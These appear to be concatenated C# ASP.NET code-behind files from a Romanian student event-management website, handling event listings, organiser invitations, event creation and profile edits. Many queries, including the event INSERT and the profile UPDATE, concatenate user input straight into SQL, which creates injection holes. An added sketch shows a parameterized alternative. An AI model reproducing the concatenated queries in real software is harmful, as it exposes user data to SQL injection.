NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in GridViewFeatured.Rows)
{
ButtonEvenimenteCreate.ToolTip = "1";
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment "+index_eveniment + " " ;
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia ButtonCreate_CLick "+ ex.Message;
}
//if (((Label)Panelcreate.FindControl("k2")) == null)
//{
// Label k = new Label();
// k.ID = "k2";
// k.Text = "Rezultatele cautarii:";
// Panelcreate.Controls.Add(k);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
//}
//using (SqlDataReader SRD = cmd.ExecuteReader())
//{
// while (SRD.Read())
// {
// LinkButton btn = new LinkButton();
// btn.ID = "LinkEvenimentCreat" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// if (((LinkButton)Panelcreate.FindControl(btn.ID)) == null)
// {
// ButtonEvenimenteCreate.ToolTip = "1";
// btn.ID = "LinkEvenimentCreat" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// btn.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// btn.Click += new EventHandler(butonevenimentcreat);
// Panelcreate.Controls.Add(btn);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
// Label l3 = new Label();
// if (Convert.IsDBNull(SRD["descriere"])) l3.Text = "";
// else l3.Text = "Descriere :" + SRD.GetString(SRD.GetOrdinal("descriere")).ToString();
// Panelcreate.Controls.Add(l3);
// Label l = new Label();
// l.Text = "ID: " + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
// l.Visible = false;
// Panelcreate.Controls.Add(l);
// Panelcreate.Controls.Add(new LiteralControl("</br>"));
// Panelcreate.Controls.Add(new LiteralControl("<p></p>"));
// }
// }
//}
sqlConnection1.Close();
}
protected void Button_CreazaEveniment(object sender, EventArgs e)
{
Response.Redirect("CreazaEveniment.aspx");
}
protected void ButtonCreateAscunde_Click(object sender, EventArgs e)
{
ButtonEvenimenteCreate.ToolTip = "0";
Panelcreate.Controls.Clear();
}
protected void butoneveniment(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
// int okk = 0;
protected void toPaginaEvenimentAccesat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
if(x.ToolTip == "ev_creat"){
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
//SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// okk++;
// LabelMesajEroare.Text += " in catrepag " + Session["IdEvenimentSelectat"] + " ";
Response.Redirect("Eveniment.aspx");
}
}
protected void butonevenimentcreat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(18));
SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
protected void invitatiiCaOrganizator()
{
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
//LabelMesajEroare.Text += Session["id"] + "s#";
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=0;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=0;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("ID", typeof(int));
// Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader fiecareEvenimentLaCareEsteInvitat = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteInvitat.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteInvitat.GetInt32(fiecareEvenimentLaCareEsteInvitat.GetOrdinal("id_eveniment")));
}
fiecareEvenimentLaCareEsteInvitat.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
NewRow[0] = InfoEvenimente.GetInt32(0);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[1] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
listaInvitatii.DataSource = Table_Evenimente;
listaInvitatii.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in listaInvitatii.Rows)
{
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Yes";
accepta.Click += new EventHandler(acceptaCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton refuza = new LinkButton();
refuza.ID = "r" + idFiecareEveniment[index_eveniment].ToString();
refuza.Text = "No";
refuza.Click += new EventHandler(refuzaCaOrganizator);
row.Cells[i].Controls.Add(refuza);
i++;
LinkButton nume = new LinkButton();
nume.ID = "n" + idFiecareEveniment[index_eveniment].ToString();
nume.Text = numeFiecareEveniment[index_eveniment];
nume.ToolTip = "toEvent";
nume.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge11 " + ex.Message;
}
sqlConnection1.Close();
listaInvitatii.Visible = true;
}
}
protected void featurednelogat(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
String query = "select TOP 5 id_eveniment,count(id_utilizator) from participa group by id_eveniment order by id_eveniment desc";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
{
while (evenimetfeatured.Read())
{
idevenimetfeatured.Add(evenimetfeatured.GetInt32(evenimetfeatured.GetOrdinal("id_eveniment")));
}
evenimetfeatured.Close();
}
foreach (int idEvent in idevenimetfeatured)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[1] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(butoneveniment);
row.Cells[i].Controls.Add(spre);
//i++;
//Label refuza = new Label();
//refuza.ID = "r" + idevenimetfeatured[index_eveniment].ToString();
//refuza.Text = row.Cells[2].Text.ToString();
//row.Cells[i].Controls.Add(refuza);
//i++;
//Label nume = new Label();
//nume.ID = "n" + idevenimetfeatured[index_eveniment].ToString();
//nume.Text = row.Cells[1].Text.ToString();
//nume.ToolTip = "toEvent";
//row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
sqlConnection1.Close();
}
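// NOTE (illustrative sketch): featurednelogat first collects the top event ids and then
// queries evenimente once per id. One JOIN with GROUP BY yields the same rows in a single
// statement; assumes the participa/evenimente schema used above. The original orders by
// id, whereas here the participant count drives the ordering.
private SqlCommand ComandaFeatured()
{
return new SqlCommand(
"select top 5 e.id, e.nume, e.data_inceperii, e.oras " +
"from participa p join evenimente e on e.id = p.id_eveniment " +
"group by e.id, e.nume, e.data_inceperii, e.oras " +
"order by count(p.id_utilizator) desc",
sqlConnection1);
}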
protected void acceptaCaOrganizator(object sender,EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if(eveniment.Text == "Yes"){
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Update organizeaza set aprobat = 1 where id_eveniment = " + idEveniment;
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void refuzaCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "No")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = "+Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void retragereCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Renunta")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = " + Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("homepage.aspx");
}
protected void catrePaginaEveniment(object sender, EventArgs e)
{
//LabelMesajEroare.Text = "*";
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Click")
{
// LabelMesajEroare.Text = "&";
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
if(eveniment.ToolTip == "toEvent"){
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
Session["IdEvenimentSelectat"] = idEveniment;
// SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// LabelMesajEroare.Text += "%" + idEveniment;
Response.Redirect("Eveniment.aspx");
}
protected void Button_EvenimenteOrganizate_Click(object sender, EventArgs e)
{
GridView_listaEvenimenteOrganizate.Visible = true;
GridView_listaEvenimenteOrganizate.ToolTip = "1";
SqlCommand cmd = new SqlCommand();
int invitatiiExista = 0;
//LabelMesajEroare.Text = "*";
//if (Button_EvenimenteOrganizate.ToolTip == "0")
Button_EvenimenteOrganizate.ToolTip = "1";
//else
// Button_EvenimenteOrganizate.ToolTip = "0";
try
{
String query = "SELECT count(id_eveniment) from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
invitatiiExista = Convert.ToInt32(cmd.ExecuteScalar());
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge buton evenimente organizate " + ex.Message;
}
sqlConnection1.Close();
if (invitatiiExista != 0)
{
try
{
String query = "SELECT id_eveniment from organizeaza where id_organizator = " + Session["id"] + " and aprobat=1;";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
//Table_Evenimente.Columns.Add("ID", typeof(int));
Table_Evenimente.Columns.Add("Nume", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Oras", typeof(string));
}
List<int> idFiecareEveniment = new List<int>();
using (SqlDataReader fiecareEvenimentLaCareEsteOrganizator = cmd.ExecuteReader())
{
while (fiecareEvenimentLaCareEsteOrganizator.Read())
{
idFiecareEveniment.Add(fiecareEvenimentLaCareEsteOrganizator.GetInt32(fiecareEvenimentLaCareEsteOrganizator.GetOrdinal("id_eveniment")));
}
fiecareEvenimentLaCareEsteOrganizator.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
// NewRow[0] = InfoEvenimente.GetInt32(0);
NewRow[0] = InfoEvenimente.GetString(1);
NewRow[1] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridView_listaEvenimenteOrganizate.DataSource = Table_Evenimente;
GridView_listaEvenimenteOrganizate.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in GridView_listaEvenimenteOrganizate.Rows)
{
Button_EvenimenteOrganizate.ToolTip = "1";
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Renunta";
accepta.Click += new EventHandler(retragereCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton linkCatreEveniment = new LinkButton();
linkCatreEveniment.ID = "l" + idFiecareEveniment[index_eveniment].ToString();
linkCatreEveniment.Text = "Click";
linkCatreEveniment.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(linkCatreEveniment);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge " + ex.Message;
}
sqlConnection1.Close();
GridView_listaEvenimenteOrganizate.Visible = true;
}
}
protected void ButtonEvenimenteOrganizateAscunde_Click(object sender, EventArgs e)
{
Button_EvenimenteOrganizate.ToolTip = "0";
GridView_listaEvenimenteOrganizate.Visible = false;
}
protected void evenimente_participa()
{
SqlCommand cmd = new SqlCommand();
String query = "select * from participa,evenimente where id_utilizator=" + Convert.ToInt32(Session["id"])+" and id_eveniment=id";
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
{
while (evenimetfeatured.Read())
{
idevenimetfeatured.Add(evenimetfeatured.GetInt32(evenimetfeatured.GetOrdinal("id_eveniment")));
}
evenimetfeatured.Close();
}
foreach (int idEvent in idevenimetfeatured)
{
//LabelMesajEroare.Text += idEvent + "s#";
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(1));
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[1] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridViewParticipa.DataSource = Table_Evenimente;
GridViewParticipa.DataBind();
        int index_eveniment = 0; // for each event ID
foreach (GridViewRow row in GridViewParticipa.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(butoneveniment);
row.Cells[i].Controls.Add(spre);
//i++;
//Label refuza = new Label();
//refuza.ID = "r" + idevenimetfeatured[index_eveniment].ToString();
//refuza.Text = row.Cells[2].Text.ToString();
//row.Cells[i].Controls.Add(refuza);
//i++;
//Label nume = new Label();
//nume.ID = "n" + idevenimetfeatured[index_eveniment].ToString();
//nume.Text = row.Cells[1].Text.ToString();
//nume.ToolTip = "toEvent";
//row.Cells[i].Controls.Add(nume);
index_eveniment++;
}
sqlConnection1.Close();
}
}<file_sep>/PIP/CreazaEveniment.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
public partial class CreazaEveniment : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
}
protected void creazaEveniment(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
LabelCreareEveniment.Text = "";
if (numeEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti numele evenimentului";
return;
}
else
if (numeEveniment.Text.Length > 50)
{
LabelCreareEveniment.Text = "Denumirea evenimentului este prea lunga";
return;
}
if (ziuaEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti o zi!";
return;
}
if (anEveniment.Text == "")
{
LabelCreareEveniment.Text = " Introduceti un an!";
return;
}
if (etichetaEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti etichete!";
return;
}
else
if (etichetaEveniment.Text.Length > 128)
{
LabelCreareEveniment.Text = "Eticheta evenimentului este prea lunga";
return;
}
if (descriereEveniment.Text == "")
{
LabelCreareEveniment.Text = "Introduceti descrierea!";
return;
}
else
if (descriereEveniment.Text.Length > 128)
{
LabelCreareEveniment.Text = "Descrierea evenimentului este prea lunga";
return;
}
int zi = DateTime.Now.Day, luna = DateTime.Now.Month, an = DateTime.Now.Year,ora=DateTime.Now.Hour,minut=DateTime.Now.Minute;
if (Int32.TryParse(oraEveniment.Text, out ora) == false)
{
LabelCreareEveniment.Text = "Introduceti o ora numar intreg";
return;
}
else
{
if ( ora>23 || ora <0 )
{
LabelCreareEveniment.Text = "Introduceti o ora numar intreg intre 0 si 23 ";
return;
}
}
if (Int32.TryParse(minutEveniment.Text, out minut) == false)
{
LabelCreareEveniment.Text = "Introduceti un minut numar intreg";
return;
}
else
{
            if (minut > 59 || minut < 0)
{
LabelCreareEveniment.Text = "Introduceti un minut numar intreg intre 0 si 59 ";
return;
}
}
if (Int32.TryParse(anEveniment.Text, out an) == false)
{
LabelCreareEveniment.Text = "Introduceti un an numar intreg";
return;
}
else
{
if (an < DateTime.Now.Year || an > 3000)
{
LabelCreareEveniment.Text = "Introduceti un an numar intreg intre " + DateTime.Now.Year + " si 3000 ";
return;
}
}
luna = lista_luni.SelectedIndex + 1;
        // Months with 30 days or fewer: February, April, June, September,
        // November; all the other months have 31 days.
        bool lunaScurta = false;
        if (luna == 2 || luna == 4 || luna == 6 || luna == 9 || luna == 11)
        {
            lunaScurta = true;
        }
if (Int32.TryParse(ziuaEveniment.Text, out zi) == false)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg";
return;
}
else
{
            if (lunaScurta == true)
            {
                if (luna == 2)
                { // February
                    // leap year: divisible by 4 but not by 100, or divisible by 400
                    if ((an % 4 == 0 && an % 100 != 0) || (an % 400 == 0))
                    {
                        if (zi < 1 || zi > 29)
                        {
                            LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 29 ";
                            return;
                        }
                    }
                    else
                    {
                        if (zi < 1 || zi > 28)
                        {
                            LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 28 ";
                            return;
                        }
                    }
                }
if (zi < 1 || zi > 30)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 30 ";
return;
}
}
else
if (zi < 1 || zi > 31)
{
LabelCreareEveniment.Text = "Introduceti o zi numar intreg intre 1 si 31 ";
return;
}
}
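        // Illustrative cross-check (an assumption, not part of the original page):
        // DateTime.DaysInMonth covers month lengths and leap years in one call,
        // which the hand-rolled checks above approximate.
        if (zi < 1 || zi > DateTime.DaysInMonth(an, luna))
        {
            LabelCreareEveniment.Text = "Introduceti o zi valida pentru luna selectata";
            return;
        }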
DateTime data = DateTime.Now;
string dataString = luna + "." + zi + "." + an+" "+ora+":"+minut;
LabelCreareEveniment.Text = dataString;
try
{
data = Convert.ToDateTime(dataString);
}
        catch (Exception ex)
        {
            LabelCreareEveniment.Text = "Data introdusa nu este valida";
            return;
        }
//----------------------------------------------------------------------
String etichete = etichetaEveniment.Text;
etichete += " " + numeEveniment.Text.ToString() + " " + orasEveniment.Text.ToString() + " " + judetEveniment.Text.ToString() + " " + taraEveniment.Text.ToString();
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlConnection1.Close();
sqlConnection1.Open();
//----------------------------------------------------------------------
cmd = new SqlCommand("INSERT INTO evenimente(nume, descriere, data_inceperii, etichete, oras, judet, tara, id_proprietar) VALUES('" + numeEveniment.Text.ToString() + "','" + descriereEveniment.Text.ToString() + "','" + data + "','" + etichete + "','" + orasEveniment.Text.ToString() + "','" + judetEveniment.Text.ToString() + "','" + taraEveniment.Text.ToString() + "'," + Session["id"] + ")", sqlConnection1);
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
try
{
cmd.ExecuteNonQuery();
LabelCreareEveniment.Text = "Inregistrare reusita";
numeEveniment.Text = "";
descriereEveniment.Text = "";
orasEveniment.Text = "";
judetEveniment.Text = "";
taraEveniment.Text = "";
ziuaEveniment.Text = "";
anEveniment.Text = "";
etichetaEveniment.Text = "";
}
catch (Exception ex)
{
LabelCreareEveniment.Text = ex.Message;
return;
}
sqlConnection1.Close();
int nr2 = 0;
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandText = "select max(id) as numar from evenimente";
cmd3.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd3.ExecuteReader())
{
while (SRD5.Read())
{
nr2 = SRD5.GetInt32(SRD5.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
int nr = 0;
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandText = "select max(Id) as numar from roluri";
cmd5.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
try
{
nr = SRD5.GetInt32(SRD5.GetOrdinal("numar"));
}
catch (Exception ex)
{
nr = 0;
}
}
}
sqlConnection1.Close();
nr++;
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandText = "insert into roluri(Id, id_eveniment, denumire, descriere, max_participanti) values(" + nr + ", " + nr2 + ", 'Participant', '', 0)";
cmd4.CommandType = CommandType.Text;
sqlConnection1.Open();
cmd4.ExecuteNonQuery();
sqlConnection1.Close();
Button_creazaEveniment.Enabled = false;
}
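    // Illustrative sketch (an assumption, not part of the original page): a
    // parameterized version of the INSERT above, which avoids the SQL-injection
    // risk of string concatenation. The column names match the query used in
    // creazaEveniment; the helper itself is hypothetical and assumes
    // sqlConnection1 is already open.
    private void InsertEventSafely(string nume, string descriere, DateTime data,
                                   string etichete, string oras, string judet,
                                   string tara, int idProprietar)
    {
        using (SqlCommand safeCmd = new SqlCommand(
            "INSERT INTO evenimente(nume, descriere, data_inceperii, etichete, oras, judet, tara, id_proprietar) " +
            "VALUES(@nume, @descriere, @data, @etichete, @oras, @judet, @tara, @idProprietar)", sqlConnection1))
        {
            safeCmd.Parameters.AddWithValue("@nume", nume);
            safeCmd.Parameters.AddWithValue("@descriere", descriere);
            safeCmd.Parameters.AddWithValue("@data", data);
            safeCmd.Parameters.AddWithValue("@etichete", etichete);
            safeCmd.Parameters.AddWithValue("@oras", oras);
            safeCmd.Parameters.AddWithValue("@judet", judet);
            safeCmd.Parameters.AddWithValue("@tara", tara);
            safeCmd.Parameters.AddWithValue("@idProprietar", idProprietar);
            safeCmd.ExecuteNonQuery();
        }
    }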
}<file_sep>/PIP/profil.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data.SqlClient;
using System.Data;
public partial class profil : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select acont,nume,prenume,email,parola from utilizator where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Labelacont.Text = SRD.GetString(SRD.GetOrdinal("acont")).ToString();
LabelNume.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
LabelPrenume.Text = SRD.GetString(SRD.GetOrdinal("prenume")).ToString();
LabelEmail.Text = SRD.GetString(SRD.GetOrdinal("email")).ToString();
}
}
sqlConnection1.Close();
// afisareEvenimenteOrganizate();
}
protected void ButtonNume_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
if (TextBoxNume.Visible == true)
{
TextBoxNume.Visible = false;
cmd.Connection = sqlConnection1;
cmd.CommandText = "update utilizator set nume='" + TextBoxNume.Text + "' where acont='" + Session["nume"].ToString() + "';";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
LabelNume.Text = TextBoxNume.Text;
}
else
{
TextBoxNume.Visible = true;
TextBoxNume.Text = LabelNume.Text;
}
sqlConnection1.Close();
}
protected void ButtonPrenume_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
if (TextBoxPrenume.Visible == true)
{
TextBoxPrenume.Visible = false;
cmd.Connection = sqlConnection1;
